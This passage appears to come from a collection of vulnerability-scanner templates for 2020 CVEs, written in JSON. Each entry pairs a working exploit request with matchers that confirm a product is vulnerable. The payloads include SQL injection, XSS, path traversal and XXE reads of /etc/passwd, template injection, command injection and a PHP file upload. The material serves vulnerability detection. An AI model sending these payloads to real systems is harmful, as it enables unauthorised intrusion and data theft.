{{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html","x-jenkins"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"body_2","words":["Cookie","SessionId: null"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","kval":["x_jenkins"]}]}]},{"id":"CVE-2020-5307","info":{"name":"PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /dfsms/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["add-category.php"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-25213","info":{"name":"WordPress File Manager Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48\n\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------ca81ac1fececda48\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"poc.txt\"\nContent-Type: text/plain\n\npoc-test\n--------------------------ca81ac1fececda48--\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["poc.txt","added"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-17505","info":{"name":"Artica Web Proxy 4.30 - OS Command Injection","severity":"high"},"requests":[{"raw":["GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["array(2)","Position: ||whoami||","root"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8209","info":{"name":"Citrix XenMobile Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["fileDownload=true","application/octet-stream","attachment;"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-11546","info":{"name":"SuperWebmailer 7.21.0.01526 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mailingupgrade.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nstep=1&Language=de{${system(\"ls\")}}&NextBtn=Weiter+%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ajax_ccea.php","ajax_getemailingactions.php","ajax_getemailtemplates.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11710","info":{"name":"Kong Admin <=2.03 - Admin API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to kong","configuration","kong_env"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22210","info":{"name":"74cms - ajax_officebuilding.php SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=\u9326%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-24579","info":{"name":"D-Link DSL 2888a - Authentication Bypass/Remote Command Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n\nusername=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b\n","GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCookie: uid=6gPjT2ipmNz\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["nobody:[x*]:65534:65534","root:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11853","info":{"name":"Micro Focus Operations Bridge Manager <=2020.05 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11738","info":{"name":"WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd","{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["File Transfer","application/octet-stream","attachment; filename=\"(wp-config\\.php|passwd)\""],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:","define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24912","info":{"name":"QCube Cross-Site-Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/assets/_core/php/profile.php","{{BaseURL}}/assets/php/profile.php","{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php"],"body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert('xss')</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8982","info":{"name":"Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26413","info":{"name":"Gitlab CE/EE 13.4 - 13.6.2 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"query\": \"{\\nusers {\\nedges {\\n  node {\\n    username\\n    email\\n    avatarUrl\\n    status {\\n      emoji\\n      message\\n      messageHtml\\n     }\\n    }\\n   }\\n  }\\n }\",\n  \"variables\": null,\n  \"operationName\": null\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"avatarUrl\":","\"node\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.edges[].node.email"],"part":"body"}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-29284","info":{"name":"Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6"]},{"type":"word","part":"body","words":["Restaurent Tables","Chair List"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13258","info":{"name":"Contentful <=2020-05-21 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cda'\"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["{'api': '","</script><script>alert(document.domain)</script>',"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8644","info":{"name":"playSMS <1.4.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /index.php?app=main&inc=core_auth&route=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","POST /index.php?app=main&inc=core_auth&route=login&op=login HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nX-CSRF-Token={{csrf}}&username=%7B%7B%60echo%20%27CVE-2020-8644%27%20%7C%20rev%60%7D%7D&password=\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4468-0202-EVC"]},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"csrf","internal":true,"xpath":["/html/body/div[1]/div/div/table/tbody/tr[2]/td/table/tbody/tr/td/form/input"],"attribute":"value","part":"body"}]}]},{"id":"CVE-2020-15148","info":{"name":"Yii 2 < 2.0.38 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ=="],"matchers-condition":"and","matchers":[{"type":"word","words":["total","An internal server error occurred."],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-2733","info":{"name":"JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/manage/fileDownloader?sec=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ACHCJK"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35986","info":{"name":"Rukovoditel <= 2.7.2 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=users_groups/users_groups&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2020-8515","info":{"name":"DrayTek - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mainfunction.cgi HTTP/1.1\nHost: {{Hostname}}\n\naction=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9036","info":{"name":"Jeedom <=4.0.38 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?v=d&p=%22;alert(document.domain);%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>document.title = \"\";alert(document.domain);\" - Jeedom\"</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16952","info":{"name":"Microsoft SharePoint - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["15\\.0\\.0\\.(4571|5275|4351|5056)","16\\.0\\.0\\.(10337|10364|10366)"],"condition":"or"},{"type":"regex","part":"header","regex":["(?i)(Microsoftsharepointteamservices:)"]},{"type":"status","status":[200,201],"condition":"or"}]}]},{"id":"CVE-2020-22211","info":{"name":"74cms - ajax_street.php 'key' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-26153","info":{"name":"Event Espresso Core-Reg 4.10.7.p - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"/></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-15500","info":{"name":"TileServer GL <=3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["'>\"<svg/onload=confirm('xss')>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24903","info":{"name":"Cute Editor for ASP.NET 6.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS\";><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script></p>","System.Web"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28871","info":{"name":"Monitorr 1.7.6m - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /assets/php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: text/plain, */*; q=0.01\nConnection: close\nAccept-Language: en-US,en;q=0.5\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745\nOrigin: http://{{Hostname}}\nReferer: http://{{Hostname}}\n\n-----------------------------31046105003900160576454225745\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.php\"\nContent-Type: image/gif\n\nGIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?>\n\n-----------------------------31046105003900160576454225745--\n","GET /assets/data/usrimg/{{tolower(\"{{randstr}}.php\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["d03c180355b797069cc047ff5606d689"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24312","info":{"name":"WordPress Plugin File Manager (wp-file-manager) Backup Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/"],"matchers-condition":"and","matchers":[{"type":"word","words":["Index of","wp-content/uploads/wp-file-manager-pro/fm_backup","backup_"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14181","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ViewUserHover.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["user-hover-details","content=\"JIRA\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/libagent.cgi?type=J HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nCookie: ctr_t=0; sid=123456789\n\n{\"O_\": \"A\", \"F_\": \"EXEC_CMD\", \"S_\": 123456789, \"P1_\": {\"Q\": \"cat /etc/passwd\", \"F\": \"EXEC_CMD\"}, \"V_\": 